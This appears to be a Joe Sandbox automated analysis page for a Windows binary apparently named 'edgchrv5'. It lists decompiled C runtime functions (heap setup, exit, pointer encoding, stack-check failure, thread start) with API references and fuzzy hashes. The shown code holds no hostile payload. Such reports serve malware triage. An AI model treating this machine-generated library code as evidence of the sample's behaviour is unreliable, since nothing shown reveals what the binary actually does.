			E01005A68(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x101cda4 = _t6;
				if(_t6 != 0) {
					 *0x101e2e0 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x01005a7d
0x01005a83
0x01005a8a
0x01005a91
0x01005a97
0x01005a8d
0x01005a8d
0x01005a8d

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 01005A7D

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: c77ae1ff7676601d37d520d405f725dbb32a12adcb79d6841e45062101aff7d6
Instruction ID: 534895ce18d2f2723b2a55059cb49d42ee204576214187c06bc5b317cb0efff6
Opcode Fuzzy Hash: c77ae1ff7676601d37d520d405f725dbb32a12adcb79d6841e45062101aff7d6
Instruction Fuzzy Hash: 1ED05E325903089EEB229E74AD08B663BDCA784395F044475F88DC6184E67DC540C600

Uniqueness

Uniqueness Score: -1.00%

Function 010016EE Relevance: 1.5, APIs: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E010016EE(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t12;
				void* _t13;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t23;

				_t23 = __eflags;
				_t19 = __esi;
				_t18 = __edi;
				_t13 = __ecx;
				_t12 = __ebx;
				_push( *((intOrPtr*)(_t20 + __edi + 0x74)));
			}

0x010016ee
0x010016ee
0x010016ee
0x010016ee
0x010016ee
0x010016ee

APIs

WriteFile.KERNELBASE(000000FF,00000000,0000B63E,00000000,00000000), ref: 01001716
CloseHandle.KERNEL32(000000FF), ref: 01001728

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: CloseFileHandleWrite
String ID:
API String ID: 1769507746-0
Opcode ID: fdadf8c9a0f0b6db3dc94e42deb8dc1374d796af7df6a582c8da0461edf77518
Instruction ID: b9e1ebedabe7c6933527a780a95ec854b6876f3097f9e7984a1aa9ca0fcb184b
Opcode Fuzzy Hash: fdadf8c9a0f0b6db3dc94e42deb8dc1374d796af7df6a582c8da0461edf77518
Instruction Fuzzy Hash: 04D02E31600208B6EB62ABE88D0AA8836E93B24720F000200F1F8A31C0CB7AD5008B34

Uniqueness

Uniqueness Score: -1.00%

Function 01003C9D Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E01003C9D(intOrPtr _a4) {
				void* __ebp;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t8;

				_push(0);
				_push(0);
				_push(_a4);
				_t2 = E01003B71(_t3, _t4, _t5, _t8); // executed
				return _t2;
			}

0x01003ca2
0x01003ca4
0x01003ca6
0x01003ca9
0x01003cb2

APIs

_doexit.LIBCMT ref: 01003CA9

Part of subcall function 01003B71: __lock.LIBCMT ref: 01003B7F
Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BB6
Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BCB
Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003BF5
Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003C0B
Part of subcall function 01003B71: __decode_pointer.LIBCMT ref: 01003C18
Part of subcall function 01003B71: __initterm.LIBCMT ref: 01003C47
Part of subcall function 01003B71: __initterm.LIBCMT ref: 01003C57

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 5343a0335ee9fd4c029c0489d09b6a1663b02d94bf0f9853fa9410883248f058
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: D6B0923298420837EA222546AC03F463A1997D1A64F640020BA0C1D1E0A9A2A9618099

Uniqueness

Uniqueness Score: -1.00%

Function 010032D6 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E010032D6() {
				void* _t1;

				_t1 = E01003264(0); // executed
				return _t1;
			}

0x010032d8
0x010032de

APIs

__encode_pointer.LIBCMT ref: 010032D8

Part of subcall function 01003264: TlsGetValue.KERNEL32(00000000,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 01003276
Part of subcall function 01003264: TlsGetValue.KERNEL32(00000005,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 0100328D
Part of subcall function 01003264: RtlEncodePointer.NTDLL(00000000,?,010032DD,00000000,01008CF5,0101C880,00000000,00000314,?,010053D3,0101C880,Microsoft Visual C++ Runtime Library,00012010), ref: 010032CB

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: c8d6bc852842976af8fc9478366ba43c5ee19fc6b969564a2f8440e5ca1204f5
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 01001D93 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E01001D93(void* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				void* _t265;
				void* _t266;
				void* _t334;
				void* _t335;
				void* _t337;
				void* _t348;

				_t335 = __esi;
				_t334 = __edi;
				_t266 = __ecx;
				_t265 = __ebx;
				_t348 = __eax + _t337;
			}

0x01001d93
0x01001d93
0x01001d93
0x01001d93
0x01001d93

APIs

Sleep.KERNELBASE(000002BC), ref: 01001D9A

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 7d0094ae8d0a2586f791e56104cd893b0e3c99a76d91ceb9e68538a634076a99
Instruction ID: 4a6952267c3346276b05dbc411070df77c4d860ab638cfd39e8522dbf46fa8ef
Opcode Fuzzy Hash: 7d0094ae8d0a2586f791e56104cd893b0e3c99a76d91ceb9e68538a634076a99
Instruction Fuzzy Hash: 41C022765002804FE3032B609C082583F20AB03723B2D078AD6A2841E7D5884001D723

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01002B7C Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E01002B7C(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x100e004; // 0xa4df7d0e
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x101c618 = _t6;
				 *0x101c614 = _t22;
				 *0x101c610 = _t25;
				 *0x101c60c = _t21;
				 *0x101c608 = _t27;
				 *0x101c604 = _t26;
				 *0x101c630 = ss;
				 *0x101c624 = cs;
				 *0x101c600 = ds;
				 *0x101c5fc = es;
				 *0x101c5f8 = fs;
				 *0x101c5f4 = gs;
				asm("pushfd");
				_pop( *0x101c628);
				 *0x101c61c =  *_t31;
				 *0x101c620 = _v0;
				 *0x101c62c =  &_a4;
				 *0x101c568 = 0x10001;
				_t11 =  *0x101c620; // 0x0
				 *0x101c51c = _t11;
				 *0x101c510 = 0xc0000409;
				 *0x101c514 = 1;
				_t12 =  *0x100e004; // 0xa4df7d0e
				_v812 = _t12;
				_t13 =  *0x100e008; // 0x5b2082f1
				_v808 = _t13;
				 *0x101c560 = IsDebuggerPresent();
				_push(1);
				E01005B2E(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x100c188);
				if( *0x101c560 == 0) {
					_push(1);
					E01005B2E(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x01002b7c
0x01002b7c
0x01002b7c
0x01002b7c
0x01002b7c
0x01002b7c
0x01002b7c
0x01002b82
0x01002b84
0x01002b84
0x01003169
0x0100316e
0x01003174
0x0100317a
0x01003180
0x01003186
0x0100318c
0x01003193
0x0100319a
0x010031a1
0x010031a8
0x010031af
0x010031b6
0x010031b7
0x010031c0
0x010031c8
0x010031d0
0x010031db
0x010031e5
0x010031ea
0x010031ef
0x010031f9
0x01003203
0x01003208
0x0100320e
0x01003213
0x0100321f
0x01003224
0x01003226
0x0100322e
0x01003239
0x01003246
0x01003248
0x0100324a
0x0100324f
0x01003263

APIs

IsDebuggerPresent.KERNEL32 ref: 01003219
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0100322E
UnhandledExceptionFilter.KERNEL32(0100C188), ref: 01003239
GetCurrentProcess.KERNEL32(C0000409), ref: 01003255
TerminateProcess.KERNEL32(00000000), ref: 0100325C

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8f51f89bdc738fdcee8dd02c941e2263b4d28e855df5d6472391d7dc22f59c48
Instruction ID: 4b999de7907f1fa4b6c1bdbeba49d6d52422c26c15b9234ff655a9c6f7a470f2
Opcode Fuzzy Hash: 8f51f89bdc738fdcee8dd02c941e2263b4d28e855df5d6472391d7dc22f59c48
Instruction Fuzzy Hash: A32103B4480204DFF726DF29E6486543BB4FB4C340F006959F58897248E7BEAA81CF59

Uniqueness

Uniqueness Score: -1.00%

Function 01005256 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E01005256() {

				SetUnhandledExceptionFilter(E01005214);
				return 0;
			}

0x0100525b
0x01005263

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00005214), ref: 0100525B

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fbbdf3dbae7c387d8a64395f59c8cbc35d1b45a020d0fde0e299eb2f49a44a62
Instruction ID: eb150d025d597a251b6abf46cd3183e464933fc01bcb1c8ec8eeda2250f5ffeb
Opcode Fuzzy Hash: fbbdf3dbae7c387d8a64395f59c8cbc35d1b45a020d0fde0e299eb2f49a44a62
Instruction Fuzzy Hash: 499002F02A15054AAE1667755D0940725905E5B612F414AA47189CC088EA5940459A65

Uniqueness

Uniqueness Score: -1.00%

Function 01001410 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcc8f491d4af4b31e41485d222c01f682b69cb550252992b8ebcbe23119c9f10
Instruction ID: 51509932a679419332269448163201033eb50d025f398f0e38aa8cd10d715b45
Opcode Fuzzy Hash: bcc8f491d4af4b31e41485d222c01f682b69cb550252992b8ebcbe23119c9f10
Instruction Fuzzy Hash: 8FF0F6B19483454BD7129EB888411E5BFF4EB12210B4849DEE4D893192E6369446C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 01003408 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E01003408(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x100d488);
				E01003E98(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E010039FD(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x100c220;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x100e4b0;
				E01005CB2(_t35, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E010034DD();
				E01005CB2(_t35, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x100e4a0; // 0x100e3c8
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E01005E2E( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E01003EDD(E010034E6());
			}

0x01003408
0x01003408
0x0100340a
0x0100340f
0x01003414
0x0100341a
0x01003422
0x01003425
0x0100342a
0x0100342b
0x0100342e
0x01003431
0x0100343b
0x01003440
0x01003448
0x01003450
0x01003460
0x01003460
0x01003466
0x01003469
0x01003470
0x01003477
0x01003480
0x01003486
0x0100348d
0x01003493
0x0100349a
0x010034a1
0x010034a7
0x010034aa
0x010034ad
0x010034b2
0x010034b4
0x010034b9
0x010034b9
0x010034bf
0x010034c5
0x010034d6

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0100D488,0000000C,01003543,00000000,00000000,?,010041B6,?,00000001,?,?,01005C3C,00000018,0100D558,0000000C), ref: 0100341A
__crt_waiting_on_module_handle.LIBCMT ref: 01003425

Part of subcall function 010039FD: Sleep.KERNEL32(000003E8,?,?,0100332E,KERNEL32.DLL,?,0100339A,?,01002C75), ref: 01003A09
Part of subcall function 010039FD: GetModuleHandleW.KERNEL32(?,?,?,0100332E,KERNEL32.DLL,?,0100339A,?,01002C75), ref: 01003A12

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0100344E
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0100345E
__lock.LIBCMT ref: 01003480
InterlockedIncrement.KERNEL32(0100E4B0), ref: 0100348D
__lock.LIBCMT ref: 010034A1
___addlocaleref.LIBCMT ref: 010034BF

Strings

DecodePointer, xrefs: 01003456
KERNEL32.DLL, xrefs: 01003414, 01003419, 01003424
EncodePointer, xrefs: 01003442

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 8407afd248548e6b3f7ad74b356958b254ebeec87b3feea19ecd0b7e0823f333
Instruction ID: b33008a88a3f6c66078adbd15c1753eaa7cf285ffa6dc10a03dad2304cb70a20
Opcode Fuzzy Hash: 8407afd248548e6b3f7ad74b356958b254ebeec87b3feea19ecd0b7e0823f333
Instruction Fuzzy Hash: 94119D71900702AEF723EF69D901B9ABBE0BF05314F118A5DE4D9AA2D0CB74A900CF54

Uniqueness

Uniqueness Score: -1.00%

Function 01002C6A Relevance: 9.0, APIs: 6, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E01002C6A(intOrPtr __edx, long _a4, char _a8, intOrPtr _a12, long _a16, DWORD* _a20) {
				struct _SECURITY_ATTRIBUTES* _v0;
				DWORD* _v12;
				void* _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t27;
				void* _t33;
				DWORD* _t38;
				intOrPtr* _t40;
				void* _t42;
				void* _t48;
				long _t51;
				intOrPtr _t58;
				void* _t61;
				struct _SECURITY_ATTRIBUTES* _t62;
				intOrPtr* _t64;
				void* _t65;

				_t58 = __edx;
				_push(_t64);
				E0100337A();
				_t27 = E0100335A(E01003374());
				if(_t27 != 0) {
					_t51 = _a4;
					 *((intOrPtr*)(_t27 + 0x54)) =  *((intOrPtr*)(_t51 + 0x54));
					 *((intOrPtr*)(_t27 + 0x58)) =  *((intOrPtr*)(_t51 + 0x58));
					_t58 =  *((intOrPtr*)(_t51 + 4));
					_push(_t51);
					 *((intOrPtr*)(_t27 + 4)) = _t58;
					E01003582(_t48, _t61, _t64, __eflags);
				} else {
					_t64 = _a4;
					if(E010033AE(E01003374(), _t64) == 0) {
						ExitThread(GetLastError());
					}
					 *_t64 = GetCurrentThreadId();
				}
				_t73 =  *0x101e424;
				if( *0x101e424 != 0) {
					_t42 = E01003940(_t73, 0x101e424);
					_pop(_t51);
					_t74 = _t42;
					if(_t42 != 0) {
						 *0x101e424(); // executed
					}
				}
				E01002C29(_t58, _t61, _t64, _t74); // executed
				asm("int3");
				_push(_t51);
				_push(_t48);
				_push(_t61);
				_t62 = _v0;
				_v20 = 0;
				_t75 = _t62;
				if(_t62 != 0) {
					_push(_t64);
					E0100337A();
					_t65 = E010041EA(1, 0x214);
					__eflags = _t65;
					if(__eflags == 0) {
						L17:
						_push(_t65);
						E01004117(0, _t62, _t65, __eflags);
						__eflags = _v12;
						if(_v12 != 0) {
							E010040F4(_v12);
						}
						_t33 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E01003568(0, _t58, _t62, __eflags) + 0x6c)));
						_push(_t65);
						E01003408(0, _t62, _t65, __eflags);
						 *(_t65 + 4) =  *(_t65 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t65 + 0x58)) = _a12;
						_t38 = _a20;
						 *((intOrPtr*)(_t65 + 0x54)) = _t62;
						__eflags = _t38;
						if(_t38 == 0) {
							_t38 =  &_a8;
						}
						_t33 = CreateThread(_v0, _a4, E01002C6A, _t65, _a16, _t38); // executed
						__eflags = _t33;
						if(__eflags == 0) {
							_v12 = GetLastError();
							goto L17;
						}
					}
				} else {
					_t40 = E010040CE(_t75);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t40 = 0x16;
					E010043BB(_t58, _t62, _t64);
					_t33 = 0;
				}
				return _t33;
			}

0x01002c6a
0x01002c6f
0x01002c70
0x01002c7b
0x01002c82
0x01002cae
0x01002cb4
0x01002cba
0x01002cbd
0x01002cc0
0x01002cc1
0x01002cc4
0x01002c84
0x01002c84
0x01002c95
0x01002c9e
0x01002c9e
0x01002caa
0x01002caa
0x01002cc9
0x01002cd0
0x01002cd7
0x01002cdc
0x01002cdd
0x01002cdf
0x01002ce1
0x01002ce1
0x01002cdf
0x01002ce7
0x01002cec
0x01002cf2
0x01002cf3
0x01002cf4
0x01002cf5
0x01002cfa
0x01002cfd
0x01002cff
0x01002d1d
0x01002d1e
0x01002d2f
0x01002d33
0x01002d35
0x01002d81
0x01002d81
0x01002d82
0x01002d88
0x01002d8b
0x01002d90
0x01002d95
0x01002d96
0x01002d96
0x01002d37
0x01002d3c
0x01002d3f
0x01002d40
0x01002d48
0x01002d4c
0x01002d4f
0x01002d54
0x01002d57
0x01002d59
0x01002d5b
0x01002d5b
0x01002d6e
0x01002d74
0x01002d76
0x01002d7e
0x00000000
0x01002d7e
0x01002d76
0x01002d01
0x01002d01
0x01002d06
0x01002d07
0x01002d08
0x01002d09
0x01002d0a
0x01002d0b
0x01002d11
0x01002d19
0x01002d19
0x01002d9c

APIs

___set_flsgetvalue.LIBCMT ref: 01002C70

Part of subcall function 0100337A: TlsGetValue.KERNEL32(?,01002C75), ref: 01003383
Part of subcall function 0100337A: __decode_pointer.LIBCMT ref: 01003395
Part of subcall function 0100337A: TlsSetValue.KERNEL32(00000000,01002C75), ref: 010033A4

___fls_getvalue@4.LIBCMT ref: 01002C7B

Part of subcall function 0100335A: TlsGetValue.KERNEL32(?,?,01002C80,00000000), ref: 01003368

___fls_setvalue@8.LIBCMT ref: 01002C8E

Part of subcall function 010033AE: __decode_pointer.LIBCMT ref: 010033BF

GetLastError.KERNEL32(00000000,?,00000000), ref: 01002C97
ExitThread.KERNEL32 ref: 01002C9E
GetCurrentThreadId.KERNEL32 ref: 01002CA4

Memory Dump Source

Source File: 00000000.00000002.397079156.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.397073998.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397388896.000000000100C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397398588.000000000100E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.397414417.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_edgchrv5.jbxd

Similarity

API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue
String ID:
API String ID: 3607243393-0
Opcode ID: e6c259e150d8e4bfbf257b2337154d8a0375406920008c6838f412688be08f06
Instruction ID: 2c99f78f17ff2c6ab8e29dd09fcf784e4cee3cbfc5c1cdc3c2f30557305a5dbd
Opcode Fuzzy Hash: e6c259e150d8e4bfbf257b2337154d8a0375406920008c6838f412688be08f06
Instruction Fuzzy Hash: 61F08275400645AFF727EFB2C548C8E7BA9BF59244F20C294E8C48B345DE35D842CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 01006230 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E01006230(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x100d598);
				E01003E98(__ebx, __edi, __esi);
				_t31 = E01003568(__ebx, __edx, __edi, _t35);
				_t15 =  *0x100ec80; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E01005CB2(_t25, 0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x100e8d8; // 0x1422b20
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x100e4b0;
								if(__eflags != 0) {
									_push(_t33);
									E01004117(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x100e8d8; // 0x1422b20
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x100e8d8; // 0x1422b20
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E010062CB();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E01003A2D(_t29, _t31, 0x20);
				}
				return E01003EDD(_t33);
			}

0x01006230
0x01006230
0x01006230
0x01006230
0x01006232
0x01006237
0x01006241
0x01006243
0x0100624b
0x0100626c
0x01006272
0x01006276
0x01006279
0x0100627c
0x01006282
0x01006284
0x01006286
0x01006289
0x0100628f
0x01006291
0x01006293
0x01006299
0x0100629b
0x0100629c
0x010062a1
0x01006299
0x01006291
0x010062a2
0x010062a7
0x010062aa
0x010062b0
0x010062b4
0x010062b4
0x010062ba
0x010062c1
0x01006253
0x01006253
0x01006253
0x01006258
0x0100625c
0x01006261
0x01006269

APIs

__getptd.LIBCMT ref: 0100623C

